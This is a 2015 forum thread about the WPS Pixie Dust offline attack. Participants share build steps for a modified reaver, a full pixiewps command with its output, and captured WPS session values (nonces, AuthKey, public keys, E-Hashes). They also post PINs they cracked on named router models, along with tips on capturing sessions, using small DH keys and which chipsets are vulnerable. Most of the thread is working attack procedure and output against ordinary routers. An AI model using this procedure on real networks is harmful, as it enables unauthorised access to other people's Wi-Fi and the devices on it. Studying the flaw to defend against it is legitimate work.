WPS Pixie Dust Attack (Offline WPS Attack)

**soxrok2212** · 2015-03-30

Datahead and I began digging into Netgear router's source and found some interesting bits of information. We think that we might have found how the actually pin is generated... Simply with a defined rand() function. It looks as if it uses the dev password (which can be found in the M1 packet in a WPS transaction) and has something to do with the system time. We are looking for help from crypto people who know what they are doing. It's looks promising, the same thing was found in 2/2 checked source codes so far: WNDR3400v2 and R6300v1.

**kcdtv** · 2015-03-30

Very interisting what you say about netgear... are you talking about cg3100 series?
And... *** with the Router with 2 PIN enabled? How did they manage that

.... Incredible...
Very good work guys, it is impressing

**SubZero5** · 2015-03-30

I believe when the PIN is enabled, the pin on the back is active but when it is disabled, that stated PIN is enabled. Any thoughts on this?

**soxrok2212** · 2015-03-31

Originally Posted by SubZero5

I believe when the PIN is enabled, the pin on the back is active but when it is disabled, that stated PIN is enabled. Any thoughts on this?

No, they actually both work at the same time. It seems to just be a secret pin...

Originally Posted by wn722

copy.
How do you guys get the keys out of pcap file?
just use wireshark?

Well everything but the Authkey can be found in wireshark. You can download the modified version of reaver that prints the Authkey, Enrollee Nonce, E-Hash1 and E-Hash2 here. The rest you need to find in a cap file/wireshark. -This was made following wiire's advice from a previous post!

The PKE and PKR (Public Keys) are in the M1 and M2 messages. The M1 contains "Public Key" which is the PKE and the M2 also contains a "Public Key" but this key is different... aka the PKR. (Just right click and copy the values)

If you can give me all this data, that would help A LOT in testing. Print it just like this:

Code:

N1 Enrollee Nonce: 
Authkey: 
PKE: 
PKR: 
E-Hash1: 
E-Hash2:

And optional (but very helpful) information:

Code:

Manufacturer: 
Model Number:
Hardware Version:

All you have to do is:

Code:

cd /path/to/reaver-wps-fork/src
./configure
make
make install

Then you should be good to find data

**mmusket33** · 2015-03-31

Install matters for reaver download

Go to the src folder

To avoid a file permission error type

chmod 755 configure

then

./configure

make

make install

If you get the following error

checking for pcap_open_live in -

lpcap... no
error: pcap library not found!

Then install these two(2) files:

sudo apt-get install libpcap-dev

sudo apt-get install libsqlite3-dev

then

./configure

make

make install

Program ran fine after this

Great Stuff Soxrox2212!!!

**psicomantis** · 2015-03-31

Havent had a chance to test the PIN, but here is what I got.

Code:

Arris - DG1670AB2

N1 Enrollee Nonce: 5b:21:6e:79:7f:3d:76:ff:b0:d7:90:69:33:bc:d3:d7
Authkey: 7f:de:11:b9:69:1c:de:26:4a:21:a4:6f:eb:3d:b8:aa:aa:d7:30:09:09:32:b8:24:43:9b:e0:91:78:e7:6f:2c
PKE: d4:38:91:0d:4e:6e:15:fe:70:f0:97:a8:70:2a:b8:94:f5:75:74:bf:64:19:9f:92:82:9b:e0:2c:c0:a3:75:48:08:8f:63:0a:82:37:0c:b7:95:42:cf:55:ca:a5:f0:f7:6c:b2:c7:5f:0e:23:18:44:f4:2d:00:f1:da:d4:94:23:56:c7:2c:b0:f6:87:c7:77:d0:cc:11:35:cf:b7:4f:bc:44:8d:ca:35:8a:78:3d:99:7f:2b:cf:44:21:d8:e2:0f:3c:7d:a4:72:c8:03:6f:77:2a:e9:fa:c1:e9:a8:2c:74:65:99:5a:e0:a5:26:d9:23:5e:4e:ec:5a:07:07:ab:80:db:3f:5f:18:7f:fa:fa:f1:57:74:b2:8d:a9:97:a6:c6:0a:a5:e0:ec:93:09:23:67:f6:3e:ec:1f:55:32:a4:5d:73:8f:ab:91:74:cf:1d:79:85:12:c1:81:f5:ea:a6:68:9d:8e:c7:c6:be:01:dc:d9:f8:68:80:11:55:d7:44:6a
PKR: bc:ad:54:2f:88:44:7c:12:69:ef:34:31:4a:17:1c:92:b1:d7:06:4c:73:be:9f:d3:ed:87:63:74:10:46:0f:46:8c:36:b5:d4:a0:ba:af:85:9c:b2:30:42:d7:59:43:75:5a:d7:79:96:fb:ee:7b:66:db:b7:a8:f9:22:9c:a5:d3:b8:e7:c0:c4:5c:58:34:1f:56:a8:1a:41:a8:d2:e8:f6:3e:c9:3a:93:d9:9b:59:5c:a8:e0:78:84:6c:fc:05:e8:76:a3:e6:3b:33:94:4a:a9:ff:50:fb:60:fa:97:3b:6d:cc:04:f1:5e:36:24:a9:06:7a:f8:6b:00:e9:71:9d:89:be:9c:b2:9c:1f:ca:6d:d6:4d:ab:46:3d:b3:11:1f:8d:40:f7:c8:a4:39:48:c5:ca:1b:f6:30:95:7d:d9:68:41:ef:0a:37:b2:4a:37:e4:a4:b0:dd:7e:c1:af:3e:66:ea:bf:16:0a:7a:8a:05:00:01:a4:29:77:a9:d4:81:d4:0e
E-Hash1: 90:5f:f5:7d:93:e5:c4:3c:62:0d:26:65:dd:59:57:d5:ba:ba:f1:b7:30:91:72:7c:54:94:38:08:1e:13:35:38
E-Hash2:b0:2b:07:50:28:e7:6e:5f:fa:27:1b:31:92:85:43:cb:c5:6a:ec:73:e2:27:c3:b9:80:ec:5b:ed:88:f0:1e:ec

PIN Found- 04847533

**soxrok2212** · 2015-03-31

Originally Posted by psicomantis

Havent had a chance to test the PIN, but here is what I got.

Code:

Arris - DG1670AB2

PIN Found- 04847533

This is what I got:

root@Kali:~# pixiewps -a 7f:de:11:b9:69:1c:de:26:4a:21:a4:6f:eb:3d:b8:aa:aa :d7:30:09:09:32:b8:24:43:9b:e0:91:78:e7:6f:2c -e d4:38:91:0d:4e:6e:15:fe:70:f0:97:a8:70:2a:b8:94:f5 :75:74:bf:64:19:9f:92:82:9b:e0:2c:c0:a3:75:48:08:8 f:63:0a:82:37:0c:b7:95:42:cf:55:ca:a5:f0:f7:6c:b2: c7:5f:0e:23:18:44:f4:2d:00:f1:da:d4:94:23:56:c7:2c :b0:f6:87:c7:77:d0:cc:11:35:cf:b7:4f:bc:44:8d:ca:3 5:8a:78:3d:99:7f:2b:cf:44:21:d8:e2:0f:3c:7d:a4:72: c8:03:6f:77:2a:e9:fa:c1:e9:a8:2c:74:65:99:5a:e0:a5 :26:d9:23:5e:4e:ec:5a:07:07:ab:80:db:3f:5f:18:7f:f a:fa:f1:57:74:b2:8d:a9:97:a6:c6:0a:a5:e0:ec:93:09: 23:67:f6:3e:ec:1f:55:32:a4:5d:73:8f:ab:91:74:cf:1d :79:85:12:c1:81:f5:ea:a6:68:9d:8e:c7:c6:be:01:dc:d 9:f8:68:80:11:55:d7:44:6a -r bc:ad:54:2f:88:44:7c:12:69:ef:34:31:4a:17:1c:92:b1 :d7:06:4c:73:be:9f:d3:ed:87:63:74:10:46:0f:46:8c:3 6:b5:d4:a0:ba:af:85:9c:b2:30:42:d7:59:43:75:5a:d7: 79:96:fb:ee:7b:66:db:b7:a8:f9:22:9c:a5:d3:b8:e7:c0 :c4:5c:58:34:1f:56:a8:1a:41:a8:d2:e8:f6:3e:c9:3a:9 3:d9:9b:59:5c:a8:e0:78:84:6c:fc:05:e8:76:a3:e6:3b: 33:94:4a:a9:ff:50:fb:60:fa:97:3b:6d:cc:04:f1:5e:36 :24:a9:06:7a:f8:6b:00:e9:71:9d:89:be:9c:b2:9c:1f:c a:6d:d6:4d:ab:46:3d:b3:11:1f:8d:40:f7:c8:a4:39:48: c5:ca:1b:f6:30:95:7d:d9:68:41:ef:0a:37:b2:4a:37:e4 :a4:b0:dd:7e:c1:af:3e:66:ea:bf:16:0a:7a:8a:05:00:0 1:a4:29:77:a9:d4:81:d4:0e -s 90:5f:f5:7d:93:e5:c4:3c:62:0d:26:65:dd:59:57:d5:ba :ba:f1:b7:30:91:72:7c:54:94:38:08:1e:13:35:38 -z b0:2b:07:50:28:e7:6e:5f:fa:27:1b:31:92:85:43:cb:c5 :6a:ec:73:e2:27:c3:b9:80:ec:5b:ed:88:f0:1e:ec

[%] Progress: 0% 100%[*] Time taken: 0 s
[*] ES-1: 00:00:00:00:00:00:00:00:00:00:00:00:00:00:00:00
[*] ES-2: 00:00:00:00:00:00:00:00:00:00:00:00:00:00:00:00
[*] PSK1: d4:eb:0c:2a:38:15:e1:a0:3d:70:db:74:31:eb:53:a3
[*] PSK2: d3:b7:e6:23:f3:1d:22:0a:23:ea:07:bb:7f:76:65:8b

[+] WPS pin: 04840753

**mmusket33** · 2015-03-31

To Soxrox2212

We see your written reaver program provides the Enrollee nonce

The problem we are having is with the -pke and -pkr keys. When we capture the M1 and M2 message with wireshark the message is too long. Note in the working example published in these threads the length of the -pke string was 384. Our captures are twice that long.

The string length of the -ak -hash1 and -hash2 is 64

A breakdown of M1 and M2 can be found at:

https://briolidz.wordpress.com/2012/...ted-setup-wps/

Enrollee -> Registrar: M1 = Version || N1 || Description || PKE
Enrollee <- Registrar: M2 = Version || N1 || N2 || Description || PKR [ || ConfigData ] || HMAC_AuthKey(M1 || M2*)

• || this symbol means concatenation of parameters to form a message.
• Mn* is message Mn excluding the HMAC-SHA-256 value.
• Version identifies the type of Registration Protocol message.
• N1 is a 128-bit random number (nonce) specified by the Enrollee.
• N2 is a 128-bit random number (nonce) specified by the Registrar.
• Description contains a human-readable description of the sending device (UUID, manufacturer, model number, MAC address, etc.) and device capabilities such as supported algorithms, I/O channels, Registration Protocol role, etc. Description data is also included in 802.11 probe request and probe response messages

Our understanding is we must strip off parts of the M1 and M2 message is this correct?

**soxrok2212** · 2015-03-31

Originally Posted by mmusket33

To Soxrox2212

Our understanding is we must strip off parts of the M1 and M2 message is this correct?

All you should have to do is open wireshark, navigate to the M1 and M2 messages, then scroll to the public keys and copy the values for those keys... I'd upload a screenshot but the formatting requirements to upload are whack...

**mmusket33** · 2015-03-31

MTeams are stumbling thru this attack testing on three(3) different computers.

Here is an administrative problem to watch out for.

1. When running the new reaver program provided by soxrox2212 you should see additional text data.

Such as:

Starting Cracking Session....

> N1 Enrollee Nounce: ....

>Auth Key....

If you just see normal reaver output stop reaver and make sure the Network-Manager Icon has both

Enable Networking
Enable Wireless

checked. If that does not work restart the computer.

Some laptops will not provide this output unless these two(2) items are functioning.

**wn722** · 2015-03-31

hey, I'm testing it with TP-Link device on WN722N usb dongle (Atheros)

Code:

Atheros Communications, Inc. AR9271 802.11n

and nothing comes up with wpsOffline script.
can anyone ping me pixiewps.c version?
link on dropbox is dead

p.s.
on some routers PKE comes up as

Code:

00:00:00:00:00:00:00:00:00:00:00:00:00:00:00:00:00:00:00:00:00:00:00:00:00:00:00:00:00:00:00:00:00:00:00:00:00:00:00:00:00:00:00:00:00:00:00:00:00:00:00:00:00:00:00:00:00:00:00:00:00:00:00:00:00:00:00:00:00:00:00:00:00:00:00:00:00:00:00:00:00:00:00:00:00:00:00:00:00:00:00:00:00:00:00:00:00:00:00:00:00:00:00:00:00:00:00:00:00:00:00:00:00:00:00:00:00:00:00:00:00:00:00:00:00:00:00:00:00:00:00:00:00:00:00:00:00:00:00:00:00:00:00:00:00:00:00:00:00:00:00:00:00:00:00:00:00:00:00:00:00:00:00:00:00:00:00:00:00:00:00:00:00:00:00:00:00:00:00:00:00:00:00:00:00:00:00:00:00:00:00:02

cheers.

my data is

Code:

> AuthKey: 89:90:f7:93:61:95:eb:3b:36:5e:6e:31:b9:e6:cc:76:e4:20:8b:b9:a6:65:00:de:0a:d4:2e:06:70:64:5c:46
[+] Sending M2 message
 > E-Hash1: 9b:21:69:1d:bd:94:16:b5:b6:53:74:76:48:88:69:ed:e4:ae:30:95:82:22:4f:fa:a5:3c:56:19:45:f5:3e:ac
 > E-Hash2: 22:ac:97:70:3d:c0:e6:2d:28:d4:9e:61:f7:92:d2:8b:c8:59:6b:8d:14:c9:cb:15:93:76:b7:4b:19:b2:a3:95

M1 PKE - 82:ea:40:37:43:42:0b:a5:56:8e:48:50:c3:d7:ce:8b:9d:79:c8:0e:c8:01:a7:e0:45:e9:53:35:2b:e1:f9:76:e0:bd:bf:4d:9a:32:be:84:86:88:03:ca:55:61:ef:e9:af:a9:f7:99:b2:98:40:a9:cc:37:15:be:79:19:57:69:02:ac:4b:7c:11:ba:e5:3f:b6:e9:89:e9:c0:6d:0e:ac:50:d1:04:d7:f4:35:04:ec:3c:7d:0d:16:e7:c7:1b:e8:0f:37:90:7b:91:f8:3a:64:22:af:4c:9e:3c:ff:68:7c:c1:b1:b1:00:0c:ba:83:5d:18:28:b5:7b:ca:86:00:97:ff:1f:00:6e:0c:eb:6f:c2:62:85:b5:4a:19:28:b3:67:81:4b:bb:22:74:d0:ac:5e:0a:d1:91:66:cd:1b:28:76:8e:57:a1:16:af:2d:a9:ad:a1:f1:d0:fa:c6:91:5d:be:c0:d3:fb:73:d1:9a:37:47:23:64:fc:88:aa:08:01:c9
M2 PKR - 38:e3:db:ae:9c:ce:35:98:7c:f3:c8:61:ab:4d:8d:08:ef:ba:73:73:a3:bf:18:b8:e4:1b:13:62:6e:e9:9a:d8:d6:7b:fc:d0:ed:7b:55:19:2e:ff:43:e1:3b:9e:1e:bd:c8:60:29:6a:03:a1:c9:cf:47:18:0c:d6:f7:3c:32:86:27:a4:1d:77:d7:0d:0d:48:02:1e:15:81:de:0a:2c:71:3f:fa:d1:da:eb:5e:95:e4:3d:b6:a6:39:d5:ab:f8:d3:8d:d5:91:fa:b0:ac:07:51:67:2b:56:f2:39:2f:12:00:f2:42:21:8a:5f:60:1a:98:e4:f7:42:7c:b4:1c:6d:0a:1f:b3:9c:66:bf:8d:8b:27:57:04:f9:e5:c1:b9:38:4f:f6:6d:65:ec:45:dd:23:b7:72:09:91:38:f9:48:59:6e:0c:8c:df:57:10:0a:18:8b:39:d7:bb:bf:19:22:c5:98:cd:a3:28:62:c8:4f:d2:fa:8d:9f:0a:db:57:bb:26:a5

**wn722** · 2015-03-31

big ups soxrox and musket for explanations.

**dudux** · 2015-03-31

Originally Posted by wn722

big ups soxrox and musket for explanations.

If wpsOffline does not print anything that means PIN NOT FOUND! The router is not taking ES1=ES2 as zero.

the C code I hosted right here: https://bitbucket.org/dudux/wpsoffli...ode/?at=master
But it will give you the same result. Basically the attack is pretty much the same

**soxrok2212** · 2015-03-31

That version of pixiewps is depreciated. A new version should be released soon by the author wiire.

**wn722** · 2015-03-31

ok,
is it AP chipset specific? or firmware?

**soxrok2212** · 2015-03-31

Originally Posted by wn722

ok,
is it AP chipset specific? or firmware?

Both. If the vendor didn't change the WPS implementation then it is chipset specific, but the AP manufacturer may have changed that. Usually they don't however.

**wn722** · 2015-04-01

i see.
one more quetion - these keys (ak, PKE,PKR, Ehash1/2) do they need to be part of same conversation?
OR any key is good?

**soxrok2212** · 2015-04-01

They have to be from the same session. Aka pin 77755533's data will differ from 98949682. The data is not interchangable.

**psicomantis** · 2015-04-01

I havent been able to test the PIN of my initial capture, but tested thie one today and worked perfectly.

Code:

TG1672G32 

N1 Enrollee Nonce: dd:0a:25:21:2c:55:e8:6b:39:67:cf:2f:6d:0b:d9:6e
AuthKey: 54:19:47:34:ef:1a:79:5f:9a:29:2a:c2:fc:17:4a:74:78:bf:47:71:87:1e:30:27:67:3b:ef:32:58:b7:2b:4c
PKE: 7f:43:2b:4d:4b:ab:2e:63:60:a5:10:20:75:da:c8:b9:8b:1e:4c:ff:c3:c3:29:3a:4f:4e:16:53:dc:76:df:de:d8:6c:4e:35:28:82:c0:5c:f8:79:85:51:3c:a1:06:3c:a3:6a:84:b8:43:e1:28:29:9a:0e:98:38:d2:18:0c:e4:69:ff:d4:1e:c7:a2:8e:82:1a:84:16:e7:d4:a1:c2:f6:2d:9d:5d:3d:bf:82:73:be:26:74:14:69:82:f7:d5:ee:aa:32:77:ba:79:b0:55:88:fa:9a:61:f4:f7:5e:4f:d7:da:76:da:60:b4:cd:93:e0:53:dd:62:09:33:c3:56:48:3f:22:68:b2:46:12:a2:ea:a2:75:e2:be:57:9f:86:fb:5b:bf:03:f7:2d:37:d2:10:c8:26:8d:d2:d5:b1:4a:f6:2f:66:bd:25:2d:1f:ae:90:e2:b9:ee:78:da:5b:86:59:bb:57:67:a1:63:5e:c0:66:a3:5c:82:96:62:f7:7b:ed
PKR: 0c:6d:d1:29:13:e7:b6:4c:ef:56:6e:19:4f:4d:e0:b6:5e:0f:8d:08:4d:32:af:bd:7c:75:ae:5b:15:a6:53:d7:4a:27:53:44:54:8f:18:5a:56:67:ff:a5:27:a1:a4:95:31:b5:57:af:d2:53:e2:8d:c4:b5:c2:eb:0f:b7:0c:43:82:10:aa:2f:b4:42:e5:b1:ed:a7:a1:f0:d0:50:1a:e4:69:ca:f7:a9:da:b9:ff:86:6f:68:59:61:e1:37:19:de:50:51:bd:dd:60:ef:85:a8:e2:90:64:03:24:a6:c2:9d:e4:6d:09:92:11:52:30:4c:9e:b4:2e:a8:fe:be:f8:88:7c:f4:ae:eb:57:40:b7:8f:8b:5d:f7:62:5a:bf:80:21:46:e9:83:28:95:f1:58:d9:26:f5:c6:2a:bf:83:ab:a5:eb:ac:ee:e0:96:5e:06:9f:0e:ca:06:32:2a:72:57:95:b6:dd:67:d4:f7:56:98:9b:fa:ba:51:88:e8:a7:08:34
E-Hash1: 36:7c:e3:7e:cc:75:74:f6:88:1a:6b:7d:06:15:ef:d8:2c:eb:d9:d6:07:b8:2d:68:4b:ec:25:8f:3e:14:15:07
E-Hash2: 55:c7:18:2b:c6:ed:87:de:95:d2:98:19:2e:69:f9:0e:65:a9:d0:02:5e:ed:9c:24:d4:ce:2a:63:14:61:46:56

[+] Pin cracked in 15 seconds
[+] WPS PIN: '31335492'

**wn722** · 2015-04-01

edited **************8

**soxrok2212** · 2015-04-01

Well you can compare the enrollee nonce that reaver prints with the enrollee nonce in wireshark... then you can assume the rest of the data is matching and you are looking at the right session. Don't compare PKE or PKR values as some APs reuse DH Keys!

**wn722** · 2015-04-01

nah, i was just being thick - all it takes is to run reaver with one pin attempt.
I'm assuming you get all the data from one try though

**soxrok2212** · 2015-04-01

Yes you are correct

**wn722** · 2015-04-02

anyone tried TP-Link devices?
I got some 740,841 and it's zip.

**soxrok2212** · 2015-04-02

There have been a few vulnerable ones. Are you saying you have a zip file that you want tested?

**wn722** · 2015-04-02

Originally Posted by soxrok2212

There have been a few vulnerable ones. Are you saying you have a zip file that you want tested?

no i meant i'm getting nothing when running it against the script.
I didn't see any tp-link in the list of supported devices.
c

**Dab0y** · 2015-09-02

Originally Posted by wn722

anyone tried TP-Link devices?
I got some 740,841 and it's zip.

im many try with Tp-Link Device and Not Luck

...
When im playing with wireshark and looking Tp-Link chipset much use Atheros

**mmusket33** · 2015-04-02

More reaver/bully reinstall problems with pixiedust mod

Musket Team labs did a fresh HD install of kali-linux then apt-get upgrade/apt-get install then loaded the pixie dust moded bully and reaver. First note our comments in threads above for reaver install concerning libpcap-dev and libsqlite3-dev.

In addition:

When reinstalling reaver with the pixie-dust mode you may find in wireshark that the M2 public key is always ......000000002 for ALL targets.

You will also find that when reinstalling bully that you get an openssl error message and a failed reinstall.

To correct this get an internet connection then:

apt-get install libssl-dev

Run wireshark and reaver and the public key for M2 will be seen.

Install bully and the install process proceeds with no errors.

Musket Teams Labs

**wiire** · 2015-04-02

Originally Posted by mmusket33

When reinstalling reaver with the pixie-dust mode you may find in wireshark that the M2 public key is always ......000000002 for ALL targets.

You get PKR: 00:00 [...] 00:02 when using '-S' ('--dh-small') option.

@wn722
The very first AP I tested was a TP-LINK (see my first 2 posts). But I haven't written down the model.

**wn722** · 2015-04-02

@wiire
hm, can you look it up?
also did you use wpsOffline or pixiewps script?

**mmusket33** · 2015-04-02

To Wire - Yes we ran a test and you are correct. This then leads to to the obvious question.

1. Will a pixie dust attack work with DH small data?

2. If it does then we can just run a DH small attack. This would mean that the pkr variable would always be constant.

MTeams

**wn722** · 2015-04-02

Originally Posted by mmusket33

1. Will a pixie dust attack work with DH small data?

2. If it does then we can just run a DH small attack. This would mean that the pkr variable would always be constant.

I was getting 00:00:xx:02 PK every now and then running with bare reaver. with -N -L -S option it was fixed.

**soxrok2212** · 2015-04-02

I will try to see if small DH Keys work later today. I don't expect it to however, but it is certain worth a try.

**wiire** · 2015-04-02

Originally Posted by soxrok2212

I will try to see if small DH Keys work later today. I don't expect it to however, but it is certain worth a try.

Of course it works.

I added the -S option to pixiewps so we don't need to print PKR on screen or get it on Wireshark.

@wn722
I only use my program, pixiewps.

**wn722** · 2015-04-02

Originally Posted by wiire

@wn722
I only use my program, pixiewps.

can you share a link?
cheers.

**soxrok2212** · 2015-04-02

Originally Posted by wn722

can you share a link?
cheers.

It will be out along with a video demo sometime this week.

**wiire** · 2015-04-03

Pixiewps is out!

Link to the pixiewps thread.

**FurqanHanif** · 2015-04-03

Modified Reaver Not Showing Publick Key (pke)..

Trying pin 00005678.
[+] Sending EAPOL START request
[+] Received identity request
[+] Sending identity response
> N1 Enrollee Nonce: f8:49:5a:df:00:b7:0b:9b:6c:cc:64:2d:11:c8:89:52
[+] Received M1 message
> AuthKey: ce:cc:a5:98:fb:a8:5c:c7:7b:5f:1a:a2:be:ca:1b:b5:40 :27:72:a3:3e:d7:4b:db:dd:78:bf:3c:02:bc:51:aa
[+] Sending M2 message
> E-Hash1: 75:26:1a:d3:bd:73:ed:8e:3e:15:3b:aa:33:b0:dd:92:03 :0b:93:7e:93:cb:c0:ec:34:64:9b:06:ea:61:71:8b
> E-Hash2: 01:d6:8f:f1:9d:3d:da:52:3c:45:42:2f:5f:55:f2:3a:0c :00:3f:f2:ae:bf:9c:7b:12:6e:ee:56:89:2c:52:d3
[+] Received M3 message
[+] Sending M4 message
[+] Received WSC NACK
[+] Sending WSC NACK
[+] p1_index set to 2
[+] Pin count advanced: 2. Max pin attempts: 11000
[+] Trying pin 01235678.
[+] Sending EAPOL START request
[+] Received identity request
[+] Sending identity response
> N1 Enrollee Nonce: 27:2b:38:0d:fc:3a:17:06:d4:7d:d3:09:4d:86:87:95
[+] Received M1 message
> AuthKey: 51:29:84:ca:f5:96:d2:b8:f3:90:9f:81:1f:3e:48:57:2e :5c:b1:81:13:83:84:66:86:82:d3:5b:1b:9b:75:ab
[+] Sending M2 message
> E-Hash1: 87:0f:45:30:2f:61:61:53:88:cb:b6:23:e9:ea:d5:22:9a :c4:c3:62:ff:2a:02:b7:99:a1:9d:99:d9:45:f7:82
> E-Hash2: f9:51:2a:a4:3f:79:e7:67:28:f7:37:f4:31:a7:17:ca:75 :e8:b8:3b:31:25:4a:13:60:c5:82:f5:ef:a7:cc:8f
[+] Received M3 message
[+] Sending M4 message
[+] Received WSC NACK
[+] Sending WSC NACK
[+] p1_index set to 3

**wn722** · 2015-04-03

cool.
does it matter if you use dec format or just plain string?

af:75:f6:2c:eb:08:c3:f9:71:72:22:92:04:6f:cd:0c
vs
af75f62ceb08c3f971722292046fcd0c

**soxrok2212** · 2015-04-03

I'm pretty sure both work.

**wn722** · 2015-04-03

hey any way to get the AK from wireshark only?

**wn722** · 2015-04-03

If anyone has luck on devices can you post your HW info?
didn't work for
TP link 841N v8 - AR9341
TP link 841N v9 - QCA9533-AL3A
TP link 720N v1 - AR9331

**soxrok2212** · 2015-04-03

Those are all Atheros

not supported that's why it didn't work

**wn722** · 2015-04-03

Originally Posted by soxrok2212

Those are all Atheros

not supported that's why it didn't work

that's a bummer...

**zimmaro** · 2015-04-03

many ,many thanks for this thread && hard work && scripts guys!!!!! (soxrok2212,wiire,kcdtv,rep.....thanks-so-much.)
really appreciate!!!!
one-test...seem correct
http://www.imagestime.com/show.php/1...pixie.PNG.html

**wiire** · 2015-04-03

Originally Posted by zimmaro

many ,many thanks for this thread && hard work && scripts guys!!!!! (soxrok2212,wiire,kcdtv,rep.....thanks-so-much.)
really appreciate!!!!
one-test...seem correct
http://www.imagestime.com/show.php/1...pixie.PNG.html

You could've just converted the last 6 bytes of the MAC to decimal to get the PIN. But whatever...

10/10 for the drawing!

@wn722
No.

**Quest** · 2015-04-04

Many thanks soxrok2212 and all who participated! Epic thread

**soxrok2212** · 2015-04-04

Originally Posted by Quest

Many thanks soxrok2212 and all who participated! Epic thread

Don't forget Wiire... the actual creator of the tool!

**psicomantis** · 2015-04-07

Quick question. Would it matter if I always use the enrollee nonce? or should I only use it in certain cases?

**soxrok2212** · 2015-04-07

Nah it shouldn't matter... Just be sure to always use it when you attack broadcom.

Thread: WPS Pixie Dust Attack (Offline WPS Attack)

Thread Tools

Search Thread

Display

Hybrid View

Similar Threads

WPS Pixie Dust Attack (Offline WPS Attack)

Reaver modfication for Pixie Dust Attack

Pixiewps: wps pixie dust attack tool

Posting Permissions